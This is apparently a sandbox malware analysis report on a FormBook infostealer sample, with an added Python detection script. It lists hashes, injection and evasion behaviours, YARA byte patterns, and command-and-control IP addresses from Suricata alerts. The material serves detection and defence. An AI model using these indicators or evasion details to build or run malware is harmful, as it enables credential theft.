
Windows Analysis Report
rP0n___87004354.exe

Overview

General Information

Sample name: rP0n___87004354.exe
Analysis ID: 1518123
MD5: c20955bf63ac83dcd469613d4b10504a
SHA1: 04613896a3d157769897706154223322988d17c1
SHA256: b90c861586483b929fd0e015213742bad507395c206a9b4c338e28c075839854
Tags: exe, user-Porcupine

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • rP0n___87004354.exe (PID: 980 cmdline: "C:\Users\user\Desktop\rP0n___87004354.exe" MD5: C20955BF63AC83DCD469613D4B10504A)
    • svchost.exe (PID: 4904 cmdline: "C:\Users\user\Desktop\rP0n___87004354.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • FrywuFHvnDbLo.exe (PID: 1060 cmdline: "C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mstsc.exe (PID: 2084 cmdline: "C:\Windows\SysWOW64\mstsc.exe" MD5: EA4A02BE14C405327EEBA8D9AD2BD42C)
          • FrywuFHvnDbLo.exe (PID: 3368 cmdline: "C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4956 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps
Source | Rule | Description | Author | Strings
00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x41a76:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x29c05:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(11 entries in this table on the source page; the remaining entries are not reproduced here)

Yara matches in unpacked PE files
Source | Rule | Description | Author | Strings
1.2.svchost.exe.2490000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2490000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2e443:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x165d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.2490000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.2490000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
    • 0x2f243:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x173d2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ParentImage: C:\Users\user\Desktop\rP0n___87004354.exe, ParentProcessId: 980, ParentProcessName: rP0n___87004354.exe, ProcessCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ProcessId: 4904, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ParentImage: C:\Users\user\Desktop\rP0n___87004354.exe, ParentProcessId: 980, ParentProcessName: rP0n___87004354.exe, ProcessCommandLine: "C:\Users\user\Desktop\rP0n___87004354.exe", ProcessId: 4904, ProcessName: svchost.exe
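Both Sigma matches above key on one event: a 32-bit svchost.exe (PID 4904) started by the sample from the user's Desktop and carrying the sample's own command line rather than its own, which is the fingerprint of the suspended-process hollowing the signature list reports ("Creates a process in suspended mode", "Modifies the context of a thread in another process"). The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules it matched. It runs equivalent checks over process-creation events constructed from this report's process tree: an svchost parent check, an image/command-line mismatch check, and a tree-level check for a process re-spawned through a Windows system binary from a process with the same image (FrywuFHvnDbLo.exe -> mstsc.exe -> FrywuFHvnDbLo.exe). The explorer.exe root parent (PID 3000) and the svchost parent allow-list are assumptions. One caveat when lifting indicators from this tree: FrywuFHvnDbLo.exe carries Joe Security's FakeChrome PDB path in the debug-string list further down, so its name and path are sandbox instrumentation, not artifacts created by the sample.

```python
"""Process-creation checks for the hollowing chain shown in this report.

Added example: not part of the Joe Sandbox report and not the Sigma rule it
matched. Events are constructed from the report's process tree and Sigma match
data; the root parent (explorer.exe, PID 3000) and the svchost parent
allow-list are assumptions.
"""
import ntpath

# Parents from which svchost.exe is expected to start (assumption; tune per estate).
EXPECTED_SVCHOST_PARENTS = {"services.exe", "msmpeng.exe"}
WINDOWS_DIR = "c:\\windows\\"


def basename(path):
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def argv0(cmdline):
    """Program path named by a Windows command line (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def check_event(ev):
    """Per-event checks; returns a list of finding strings."""
    findings = []
    image = basename(ev["Image"])
    parent = basename(ev["ParentImage"])
    # svchost.exe launched by something other than the service control manager.
    if image == "svchost.exe" and parent not in EXPECTED_SVCHOST_PARENTS:
        findings.append(f"svchost.exe spawned by uncommon parent {parent}")
    # The loaded image is not the program the command line names: the hollowed
    # svchost.exe in this report runs with the dropper's own command line.
    named = basename(argv0(ev["CommandLine"]))
    if named != image:
        findings.append(f"image/command-line mismatch: {image} runs as {named}")
    return findings


def analyze(events):
    """Run per-event checks plus a grandparent check over a whole tree.

    The grandparent check flags a process whose image equals its grandparent's
    while a Windows system binary sits in between. Returns {pid: [findings]}
    for processes with at least one finding.
    """
    by_pid = {ev["ProcessId"]: ev for ev in events}
    report = {}
    for ev in events:
        findings = check_event(ev)
        parent_ev = by_pid.get(ev["ParentProcessId"])
        if parent_ev is not None:
            via_system_binary = ev["ParentImage"].lower().startswith(WINDOWS_DIR)
            if via_system_binary and basename(parent_ev["ParentImage"]) == basename(ev["Image"]):
                findings.append(f"re-spawned through {basename(ev['ParentImage'])} "
                                "from a process with the same image")
        if findings:
            report[ev["ProcessId"]] = findings
    return report


def event(pid, ppid, image, parent_image, cmdline):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image,
            "ParentImage": parent_image, "CommandLine": cmdline}


DROPPER = r"C:\Users\user\Desktop\rP0n___87004354.exe"
FAKE_CHROME = r"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
SVCHOST = r"C:\Windows\SysWOW64\svchost.exe"
MSTSC = r"C:\Windows\SysWOW64\mstsc.exe"
FIREFOX = r"C:\Program Files\Mozilla Firefox\Firefox.exe"

# Constructed from the report's process tree; the explorer.exe parent is assumed.
EVENTS = [
    event(980, 3000, DROPPER, r"C:\Windows\explorer.exe", f'"{DROPPER}"'),
    event(4904, 980, SVCHOST, DROPPER, f'"{DROPPER}"'),
    event(1060, 4904, FAKE_CHROME, SVCHOST, f'"{FAKE_CHROME}"'),
    event(2084, 1060, MSTSC, FAKE_CHROME, f'"{MSTSC}"'),
    event(3368, 2084, FAKE_CHROME, MSTSC, f'"{FAKE_CHROME}"'),
    event(4956, 2084, FIREFOX, MSTSC, f'"{FIREFOX}"'),
]

if __name__ == "__main__":
    for pid, findings in analyze(EVENTS).items():
        for finding in findings:
            print(f"PID {pid}: {finding}")
```

Run against the constructed tree, only PID 4904 (two findings) and PID 3368 (one finding) are reported; the firefox.exe child of mstsc.exe passes because its image differs from the grandparent's. The mismatch check is the one worth keeping in production: a legitimate svchost.exe never runs with another program's command line, whereas the parent allow-list needs per-environment tuning.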
Suricata alerts, SID 2050745 (ET MALWARE FormBook CnC Checkin (GET) M5, per the Networking section below)
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T12:46:29.988778+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
2024-09-25T12:46:54.950374+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 217.70.184.50 | 80 | TCP
2024-09-25T12:47:08.338133+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 172.96.187.60 | 80 | TCP
2024-09-25T12:47:21.516611+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | TCP
2024-09-25T12:47:34.943685+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49753 | 67.223.117.189 | 80 | TCP
2024-09-25T12:48:09.394601+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49757 | 103.248.137.209 | 80 | TCP
2024-09-25T12:48:30.640903+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:43.979967+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49765 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:57.629655+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49769 | 85.153.138.113 | 80 | TCP
2024-09-25T12:49:11.931245+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49773 | 104.21.11.31 | 80 | TCP

Suricata alerts, SID 2855465 (ETPRO MALWARE FormBook CnC Checkin (GET) M2); same flows as the table above
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T12:46:29.988778+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49736 | 81.88.63.46 | 80 | TCP
2024-09-25T12:46:54.950374+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49740 | 217.70.184.50 | 80 | TCP
2024-09-25T12:47:08.338133+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49745 | 172.96.187.60 | 80 | TCP
2024-09-25T12:47:21.516611+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49749 | 3.33.130.190 | 80 | TCP
2024-09-25T12:47:34.943685+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49753 | 67.223.117.189 | 80 | TCP
2024-09-25T12:48:09.394601+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49757 | 103.248.137.209 | 80 | TCP
2024-09-25T12:48:30.640903+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:43.979967+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49765 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:57.629655+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49769 | 85.153.138.113 | 80 | TCP
2024-09-25T12:49:11.931245+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.4 | 49773 | 104.21.11.31 | 80 | TCP

Suricata alerts, SID 2855464 (ETPRO MALWARE FormBook CnC Checkin (POST) M3); three POSTs follow each GET check-in to the same host
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-25T12:46:46.637813+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49737 | 217.70.184.50 | 80 | TCP
2024-09-25T12:46:49.260057+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49738 | 217.70.184.50 | 80 | TCP
2024-09-25T12:46:51.747916+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49739 | 217.70.184.50 | 80 | TCP
2024-09-25T12:47:00.696604+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49742 | 172.96.187.60 | 80 | TCP
2024-09-25T12:47:03.240302+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49743 | 172.96.187.60 | 80 | TCP
2024-09-25T12:47:05.798338+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 172.96.187.60 | 80 | TCP
2024-09-25T12:47:13.838742+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49746 | 3.33.130.190 | 80 | TCP
2024-09-25T12:47:17.316782+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49747 | 3.33.130.190 | 80 | TCP
2024-09-25T12:47:20.010252+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49748 | 3.33.130.190 | 80 | TCP
2024-09-25T12:47:27.411768+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49750 | 67.223.117.189 | 80 | TCP
2024-09-25T12:47:29.890026+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49751 | 67.223.117.189 | 80 | TCP
2024-09-25T12:47:32.412218+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49752 | 67.223.117.189 | 80 | TCP
2024-09-25T12:47:41.807158+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49754 | 103.248.137.209 | 80 | TCP
2024-09-25T12:47:44.354366+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49755 | 103.248.137.209 | 80 | TCP
2024-09-25T12:47:46.904785+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49756 | 103.248.137.209 | 80 | TCP
2024-09-25T12:48:22.972850+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49758 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:25.532954+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:28.066243+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:37.387909+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:39.932241+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49763 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:41.416916+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49764 | 3.33.130.190 | 80 | TCP
2024-09-25T12:48:49.969654+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49766 | 85.153.138.113 | 80 | TCP
2024-09-25T12:48:52.523896+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49767 | 85.153.138.113 | 80 | TCP
2024-09-25T12:48:55.215174+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49768 | 85.153.138.113 | 80 | TCP
2024-09-25T12:49:03.768976+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49770 | 104.21.11.31 | 80 | TCP
2024-09-25T12:49:06.298093+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49771 | 104.21.11.31 | 80 | TCP
2024-09-25T12:49:09.089476+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.4 | 49772 | 104.21.11.31 | 80 | TCP

            AV Detection

Source: rP0n___87004354.exe | Avira: detected
Source: rP0n___87004354.exe | ReversingLabs: Detection: 73%
Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: rP0n___87004354.exe | Joe Sandbox ML: detected
Source: rP0n___87004354.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: FrywuFHvnDbLo.exe, 00000002.00000000.1729011183.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1882941520.0000000000DBE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: rP0n___87004354.exe, 00000000.00000003.1700289327.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, rP0n___87004354.exe, 00000000.00000003.1699565720.0000000004200000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1713196768.0000000002D00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.000000000309E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1710437251.0000000002B00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1816942530.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000003.00000003.1819913903.000000000436A000.00000004.00000020.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.0000000004510000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000002.3547780218.00000000046AE000.00000040.00001000.00020000.00000000.sdmp, mstsc.exe, 00000003.00000003.1818285042.00000000041B2000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mstsc.pdbGCTL source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: mstsc.pdb source: svchost.exe, 00000001.00000003.1781073080.0000000008C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1781207304.0000000008E00000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1763185053.0000000006CD0000.00000004.00000001.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000003.1764554247.0000000006E10000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: mstsc.exe, 00000003.00000002.3548096253.0000000004B3C000.00000004.10000000.00040000.00000000.sdmp, mstsc.exe, 00000003.00000002.3546768186.0000000000582000.00000004.00000020.00020000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883295228.0000000002E2C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2104098329.000000002E32C000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007D449B GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DC75D FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DC7E8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DF021 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DF17E SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DF47F FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007D3833 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007D3B56 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007DBD48 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 3_2_0017C460 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then xor eax, eax | 3_2_00169C00
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then pop edi | 3_2_0016E012
Source: C:\Windows\SysWOW64\mstsc.exe | Code function: 4x nop then mov ebx, 00000004h | 3_2_042A04DE

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49773 -> 104.21.11.31:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49773 -> 104.21.11.31:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49749 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49737 -> 217.70.184.50:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49756 -> 103.248.137.209:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49749 -> 3.33.130.190:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49750 -> 67.223.117.189:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49736 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49736 -> 81.88.63.46:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49742 -> 172.96.187.60:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49767 -> 85.153.138.113:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49755 -> 103.248.137.209:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49758 -> 3.33.130.190:80
